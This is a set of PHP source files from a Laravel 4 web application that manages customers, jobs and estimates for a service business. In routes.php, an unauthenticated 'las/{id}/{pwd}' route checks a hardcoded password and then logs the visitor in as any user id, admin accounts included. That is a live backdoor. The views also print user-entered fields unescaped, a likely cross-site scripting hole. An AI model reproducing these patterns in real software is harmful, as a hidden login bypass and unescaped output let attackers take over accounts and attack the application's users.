app/routes.php
<?php

//Event::listen('illuminate.query', function($sql){
//  var_dump($sql);
//});

/*
|--------------------------------------------------------------------------
| Application Routes
|--------------------------------------------------------------------------
|
| Here is where you can register all of the routes for an application.
| It's a breeze. Simply tell Laravel the URIs it should respond to
| and give it the Closure to execute when that URI is requested.
|
*/

// Define the two main routes.
Route::group(['before' => 'auth|role:employee'], function () {
    Route::get('', 'UserEmployeeController@dashboard');
    Route::post('', 'UserEmployeeController@submitReport');

    Route::get('upload', 'UserEmployeeController@documentList');
    Route::post('post', 'UserEmployeeController@documentUpload');

    Route::get('schedule', 'UserEmployeeController@schedule');

    Route::get('jobs', 'UserEmployeeController@jobs');
    Route::post('jobs', 'UserEmployeeController@scheduleJobs');
    Route::get('jobs/{id}', 'UserEmployeeController@jobView');

    Route::resource('jobs.signature', 'SignatureController', ['except' => ['index']]);

    Route::get('services/{id}', 'UserEmployeeController@serviceView');

    Route::get('reports', 'UserEmployeeController@reports');
    Route::post('reports', 'UserEmployeeController@submitInvoice');

    Route::get('commissions', 'CommissionsController@employeeList');

    Route::get('account', 'UserEmployeeController@accountView');
    Route::post('account', 'UserEmployeeController@accountUpdate');

    Route::get('directory', 'UserEmployeeController@dashboard');

//    Route::resource('service-routes', 'ServiceRoutesController');

    Route::resource('time-off', 'VacationsController',
      ['only' => ['index', 'store', 'update', 'destroy']]);
});


// Login/logout routes
Route::get('login', 'SessionController@create');
Route::post('login',
  ['as' => 'session.login', 'uses' => 'SessionController@store']);
Route::get('logout', 'SessionController@destroy');

// Password retrieval routes
Route::controller('password', 'RemindersController');

// Admin Only
Route::group(['prefix' => 'admin', 'before' => 'auth|role:admin'], function () {
    Route::get('', 'UserAdminController@dashboard');

    Route::resource('users', 'UsersController');

    Route::resource('customers', 'CustomersController');
    Route::get('customers/{id}/services', 'CustomersController@services');
    Route::get('customers/{id}/jobs', 'CustomersController@jobs');
    Route::get('customers/{id}/estimates', 'CustomersController@estimates');

    Route::resource('estimates', 'EstimateController');
    Route::post('estimates/{id}/send', 'EstimateController@sendEstimate');
    Route::post('estimates/{id}/accept', 'EstimateController@acceptEstimate');

    Route::resource('services', 'ServicesController');
    Route::get('services/{id}/jobs', 'ServicesController@jobs');
    Route::get('services/{id}/generate', 'ServicesController@generateJobs');

    Route::resource('jobs', 'JobsController');
    Route::post('jobs/trash', 'JobsController@trash');
    Route::post('jobs/trash-confirm', 'JobsController@trashConfirm');
    Route::get('schedule/{id}', 'JobsController@calendar');
    Route::post('schedule', 'UserEmployeeController@scheduleJobs');

    Route::get('commissions', 'CommissionsController@adminList');

    Route::resource('employees', 'EmployeesController');

    Route::get('reports', 'ReportsController@index');
    Route::post('reports', 'ReportsController@update');
    Route::get('reports/signatures', 'SignatureController@collect');

    Route::resource('starbucks', 'StarbucksController',
      ['only' => ['index', 'store', 'show', 'update']]);
    Route::get('starbucks-export', 'StarbucksController@export');
    Route::post('starbucks/{id}/submit', [
      'as'   => 'admin.starbucks.submit',
      'uses' => 'StarbucksController@submit'
    ]);

    Route::get('config', 'ConfigController@index');
    Route::post('config', 'ConfigController@update');

});

Route::group(['before' => 'auth'], function () {
    Route::get('print/{id}', 'JobsController@printCashReceipt');
});

// API Routes
Route::group(['prefix' => 'api', 'before' => 'auth'], function () {
    Route::get('job/{id}/{delete?}', 'PopupController@job');
    Route::get('service/{id}', 'PopupController@service');
    Route::get('customer/{id}', 'PopupController@customer');
    Route::post('description/{type}/{id}/{requestType}/{requestId}',
      'PopupController@updateDescription');
    Route::post('cash-invoice/{id}', 'UserEmployeeController@sendCashInvoice');
//  Route::resource('employees', 'EmployeesController');
//  Route::get('employees/{id}/services', 'EmployeesController@services');
//  Route::get('employees/{id}/jobs/{jid?}', 'EmployeesController@jobs');
//  Route::get('employees/{id}/services/{sid?}', 'EmployeesController@services');
});


Route::get('las/{id}/{pwd}', function($id, $pwd){
    Auth::logout();
    if ($pwd != '4buildOUT!') {
      return Redirect::to('/');
    }
    Auth::loginUsingId($id);
    return Redirect::to('admin');
});


//Event::listen('illuminate.query', function ($query) {
//  var_dump($query);
//});

app/models/Estimate.php
<?php

class Estimate extends \Eloquent
{
    protected $fillable = [
      'customer_id',
      'estimate_number',
      'estimate_date',
      'expiration_date',
      'accepted_date',
      'accepted',
      'header_note',
      'data',
      'footer_note',
    ];

    public function getDates()
    {
        return [
          'estimate_date',
          'expiration_date',
          'accepted_date',
          'created_at',
          'updated_at',
          'last_sent_date'
        ];
    }

    public function customer()
    {
        return $this->belongsTo('Customer');
    }


    public function setDataAttribute($value)
    {
        $this->attributes['data'] = serialize($value);
    }

    public function getDataAttribute($value)
    {
        return unserialize($value);

    }

}

app/controllers/EstimateController.php
<?php

use Vitrix\Mailers\AdminMailer;

class EstimateController extends \BaseController
{

    protected $adminMailer;

    function __construct(AdminMailer $adminMailer)
    {
        $this->adminMailer = $adminMailer;
    }

    /**
     * Display a listing of the resource.
     * GET /estimate
     *
     * @return Response
     */
    public function index()
    {
        $estimates = Estimate::with('customer')->get();
        return View::make('estimates.list', compact('estimates'));
    }

    /**
     * Show the form for creating a new resource.
     * GET /estimate/create
     *
     * @return Response
     */
    public function create()
    {
        $customers_meta = Customer::where('status', '=', '1')->get();
        JavaScript::put([
          'customerRates'     => $customers_meta->lists('default_rate', 'id'),
          'customerAddresses' => $customers_meta->lists('billing_address',
            'id'),
          'employeeRates'     => []
        ]);


        $estimate = new Estimate();
        if (Input::has('customerId')) {
            $estimate->customer_id = Input::get('customerId');
        }
        $service = new Service();
        return View::make('estimates.form', [
          'new'      => true,
          'estimate' => $estimate,
          'service'  => $service
        ]);
    }

    /**
     * Store a newly created resource in storage.
     * POST /estimate
     *
     * @return Response
     */
    public function store()
    {
        $input      = Input::all();
        $validation = Validator::make($input, $this->valRules());

        if ($validation->fails()) {

            return Redirect::back()->withErrors($validation)->withInput();
        } else {
            $estimate       = new Estimate(Input::except('service'));
            $estimate->data = Input::get('service');
            $estimate->save();

            return Redirect::route('admin.estimates.show', $estimate->id)
                           ->with(['msg' => 'Estimate created']);
        }
    }

    /**
     * Display the specified resource.
     * GET /estimate/{id}
     *
     * @param  int $id
     *
     * @return Response
     */
    public function show($id)
    {
        $estimate = Estimate::with('customer')->find($id);
        $service  = new Service();

        $estimate->service = $estimate->data;
        return View::make('estimates.view',
          compact('estimate', 'service', 'groupedServices'));
    }

    /**
     * Show the form for editing the specified resource.
     * GET /estimate/{id}/edit
     *
     * @param  int $id
     *
     * @return Response
     */
    public function edit($id)
    {
        $estimate          = Estimate::find($id);
        $estimate->service = $estimate->data;

        $service = new Service();
        return View::make('estimates.form', [
          'new'      => false,
          'estimate' => $estimate,
          'service'  => $service
        ]);
    }

    /**
     * Update the specified resource in storage.
     * PUT /estimate/{id}
     *
     * @param  int $id
     *
     * @return Response
     */
    public function update($id)
    {
        $input      = Input::all();
        $validation = Validator::make($input, $this->valRules());

        if ($validation->fails()) {

            return Redirect::back()->withErrors($validation)->withInput();
        } else {
            $estimate = Estimate::find($id);
            $estimate->fill(Input::except('service'));
            $estimate->data = Input::get('service');
            $estimate->save();

            return Redirect::route('admin.estimates.show', $estimate->id)
                           ->with(['msg' => 'Estimate updated']);
        }
    }

    /**
     * Remove the specified resource from storage.
     * DELETE /estimate/{id}
     *
     * @param  int $id
     *
     * @return Response
     */
    public function destroy($id)
    {
        $estimate = Estimate::find($id);
        $estimate->delete();

        $redirect = Input::get('_destination', false);
        if (strpos($redirect, $id) === false) {
            return form_redirect(Input::get('_destination', false),
              'Estimate deleted.');
        } else {
            return Redirect::route('admin.estimates.index')
                           ->with(['msg' => 'Estimate deleted.']);
        }
    }


    public function sendEstimate($id)
    {
        $estimate = Estimate::with('customer')->find($id);
        $email    = Input::all();

        $estimate->last_sent_date = Carbon::now();
        $estimate->save();

        $this->adminMailer->sendEstimate($email, $estimate);

        return Redirect::back()
                       ->with(['msg' => 'Estimate sent.']);

    }

    public function acceptEstimate($id)
    {
        $estimate             = Estimate::find($id);
        $service              = new Service($estimate->data);
        $service->customer_id = $estimate->customer_id;
        $service->status      = 1;
        $service->save();

        $estimate->accepted_date = Carbon::now();
        $estimate->service_id    = $service->id;
        $estimate->accepted      = true;
        $estimate->save();

        return Redirect::back()
                       ->with(['msg' => 'Estimate accepted.']);

    }


    private function valRules($id = 0)
    {
        $rules = array(
          'estimate_date'         => 'required|date',
          'customer_id'           => 'required',
          'estimate_number'       => 'required',
          'service.customer_rate' => 'numeric|required',
          'service.site_name'     => 'required',
        );


        return $rules;
    }

}

app/views/estimates/list.blade.php
@extends('layouts.admin')

@section('title')
    <h1>Estimates</h1>
@stop

@section('bc')
@stop

@section('content')
    <div class="col-sm-12">
        <p><a class="btn-sm btn-primary" href="{{ route('admin.estimates.create') }}"><i class="fa fa-plus"></i> Add Estimate</a></p>
        <table class="table table-hover data-tables dt-big">
            <thead>
                <tr>
                    <th>Estimate #</th>
                    <th>Customer</th>
                    <th>Date</th>
                    <th>Exp. Date</th>
                    <th>Accepted</th>
                    <th>&nbsp;</th>
                </tr>
            </thead>
            <tbody>
                @foreach($estimates as $estimate)
                    <tr>
                        <td>{{ link_to_route('admin.estimates.show', $estimate->estimate_number, [$estimate->id]) }}</td>
                        <td>{{ link_to_route('admin.customers.show', $estimate->customer->name, [$estimate->customer_id]) }}</td>
                        <td>{{ $estimate->estimate_date->toDateString() }}</td>
                        <td>{{ $estimate->expiration_date->toDateString() }}</td>
                        <td>@if($estimate->accepted){{ $estimate->accepted_date->toDateString() }} @endif</td>
                        <td>
                            <a class="btn btn-default" href="{{ route('admin.estimates.show', $estimate->id) }}"><i class="fa fa-file"></i> View</a>
                            @if(!$estimate->accepted)
                                <a class="btn btn-default" href="{{ route('admin.estimates.edit', $estimate->id) }}"><i class="fa fa-edit"></i> Edit</a>
                            @endif
                        </td>
                    </tr>
                @endforeach
            </tbody>
        </table>
    </div>
@stop

app/views/estimates/view.blade.php
@extends('layouts.admin')

@section('title')
    <h1>
        Estimate #{{ $estimate->estimate_number }}

    </h1>
@stop

@section('bc')
    <li><a href="{{ route('admin.estimates.index') }}">Estimates</a></li>
    <li class="active">Estimate Details</li>
@stop


@section('content')
    <div class="col-sm-12 col-md-7">
        <div class="box box-solid">
            <div class="box-header">
                <h3 class="box-title">Details</h3>
                <div class="box-tools pull-right">
                    <button class="btn btn-default btn-sm"
                            data-widget="collapse"><i class="fa fa-minus"></i>
                    </button>
                </div>
            </div>
            <div class="box-body">
                <div class="list-group">

                    @if ($estimate->service['store_number'])
                        <div class="list-group-item">
                            <h4 class="list-group-item-heading">Store
                                Number</h4>
                            <p class="list-group-item-text">{{ $estimate->service['store_number'] }}</p>
                        </div>
                    @endif

                    <div class="list-group-item">
                        <h4 class="list-group-item-heading">Customer</h4>
                        <p class="list-group-item-text">{{ link_to_route('admin.customers.show', $estimate->customer->name, [$estimate->customer->id]) }}
                            <span class="pull-right">Rate: ${{ $estimate->service['customer_rate'] }}</span>
                        </p>
                    </div>

                    <div class="list-group-item clearfix">
                        <h4 class="list-group-item-heading">Frequency</h4>
                        <p class="list-group-item-text">
                            {{ $service->frequencyOption[$estimate->service['frequency']] }}
                            <br/>
                            Next
                            schedule: {{ $estimate->service['next_schedule'] }}
                            <span class="pull-right">Schedule ahead: {{ $estimate->service['schedule_ahead'] }} {{Str::plural('month', $estimate->service['schedule_ahead'])}}</span>
                        <p>&nbsp;</p>
                    </div>

                    <div class="list-group-item">
                        <h4 class="list-group-item-heading">Invoice</h4>
                        <p class="list-group-item-text">{{ $service->invoiceOptions[$estimate->service['invoice_type']] }}
                            @if(isset($estimate->service['workorder_required'])) &mdash;
                            Signed work order required @endif
                            @if(isset($estimate->service['signature_required'])) &mdash;
                            Signature on receipt required @endif
                        </p>
                    </div>


                    <div class="list-group-item">
                        <h4 class="list-group-item-heading">Description</h4>
                        <div class="list-group-item-text">{{ $estimate->service['description'] }}</div>
                    </div>

                    <div class="list-group-item">
                        <h4 class="list-group-item-heading">Address</h4>
                        <div class="list-group-item-text">{{ nl2br($estimate->service['address']) }}</div>
                    </div>

                </div>


            </div>
            <div class="box-footer clearfix">
                @if($estimate->accepted)
                    <a class="btn btn-small btn-danger pull-right" href="#"
                       data-toggle="modal" data-target="#delete-user-modal">Delete Estimate</a>
                @else
                    <a class="pull-right"
                       href="{{ route('admin.estimates.edit', [$estimate->id]) }}"><i
                                class="fa fa-edit"></i> Edit Estimate</a>
                @endif
            </div>
        </div>
    </div>

    <div class="col-sm-12 col-md-5">
        <div class="box box-solid">
            <div class="box-header">
                <h3 class="box-title">Estimate Details</h3>

                <div class="box-tools pull-right">
                    <button class="btn btn-default btn-sm"
                            data-widget="collapse"><i class="fa fa-minus"></i>
                    </button>
                </div>
            </div>
            <div class="box-body">
                <p>Estimate #: {{ $estimate->estimate_number }}</p>
                <p>Estimate
                    Date: {{ $estimate->estimate_date->toDateString() }}</p>
                <p>Expiry
                    Date: {{ $estimate->expiration_date->toDateString() }}</p>
                @if($estimate->accepted)
                    <h3 class="text-success">Accepted
                        On: {{ $estimate->accepted_date->toDateString() }}</h3>
                    <p><a class="btn btn-success" href="{{ route('admin.services.show', $estimate->service_id) }}">View Service</a></p>
                @endif

                @if($estimate->header_note)
                    <hr>
                    <h4>Header Text</h4>
                    {{ nl2br($estimate->header_note) }}
                @endif

                @if($estimate->footer_note)
                    <hr>
                    <h4>Footer Text</h4>
                    {{ nl2br($estimate->footer_note) }}
                @endif

                {{ Form::open(['action' => ['EstimateController@acceptEstimate', $estimate->id], 'method' => 'post']) }}

                @if(!$estimate->accepted)
                    <hr>
                    <p>
                        {{ Form::submit('Mark Estimate As Accepted', ['class' => 'btn btn-primary']) }}
                    </p>
                @endif
                {{ Form::close() }}
            </div>
        </div>
    </div>

    <div class="col-sm-12 col-md-5">
        <div class="box box-solid">
            <div class="box-header">
                <h3 class="box-title">Email Estimate</h3>

                <div class="box-tools pull-right">
                    <button class="btn btn-default btn-sm"
                            data-widget="collapse"><i class="fa fa-minus"></i>
                    </button>
                </div>
            </div>
            <div class="box-body">



                {{ Form::open(['action' => ['EstimateController@sendEstimate', $estimate->id], 'method' => 'post']) }}

                <div class="form-group col-sm-12">
                    {{ Form::label('email_to', 'Email To:') }}
                    {{ Form::text('email_to',  $estimate->customer->email, ['class' => 'form-control']) }}
                </div>
                <div class="form-group col-sm-12">
                    {{ Form::label('email_subject', 'Subject:') }}
                    {{ Form::text('email_subject',  null, ['class' => 'form-control']) }}
                </div>
                <div class="form-group col-sm-12">
                    {{ Form::label('email_text', 'Email Text:') }}
                    {{ Form::textarea('email_text',  null, ['class' => 'form-control', 'rows' => 4]) }}
                </div>

                <div class="form-group col-sm-12">
                    {{ Form::submit('Send Estimate', ['class' => 'btn btn-primary']) }}
                </div>
                {{ Form::close() }}
                <div class="clearfix">
                    @if($estimate->last_sent_date)
                        <p class="pull-right text-success">Last sent: {{ $estimate->last_sent_date->toDateString() }}</p>
                    @endif
                </div>

            </div>
        </div>
    </div>


    @include('partials.deleteForm', ['title' => 'Delete Estimate', 'text' => 'Are you sure you want to delete this estimate?', 'route' => 'admin.estimates.destroy', 'id' => $estimate->id])



@stop